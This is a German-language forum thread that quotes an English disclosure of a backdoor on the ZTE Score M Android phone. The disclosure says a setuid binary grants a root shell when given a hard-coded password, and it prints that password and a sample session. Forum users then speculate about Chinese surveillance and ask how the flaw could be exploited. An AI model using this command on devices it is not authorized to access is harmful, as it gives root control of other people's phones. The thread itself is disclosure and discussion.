http://pastebin.com/wamYsqTV


The ZTE Score M is an Android 2.3.4 (Gingerbread) phone available in the United States on MetroPCS, made by Chinese telecom ZTE Corporation.

There is a setuid-root application at /system/bin/sync_agent that serves no function besides providing a root shell backdoor on the device. Just give the magic, hard-coded password to get a root shell:

$ sync_agent ztex1609523
# id
uid=0(root) gid=0(root)

Nice backdoor, ZTE.


Ein Schelm, wer da wieder an die bösen Chinesen und das Klischee der Überwachung denkt :usad:

Ist aktuell nur in dem ZTE Score (baugleich zum hier bekannten Base Latea) was in den USA verkauft wird, "wir" sind also erstmal nicht betroffen. Trotzdem natürlich unschön aber kann man damit wirklich phone so einfach ausspionieren?

Die Chinesen sind doch sowieso schon mächtig am spionieren, schließlich steckt in den Mobilfunkmasten der vier Netzbetreiber die Technik von ZTE und Huawei...:biggrin:

Hm das heißt nun was genau?
Muss man das Gerät in der Hand haben und kann dann unabhängig von den Einstellungen des Users stets Zugriff auf das System bekommen?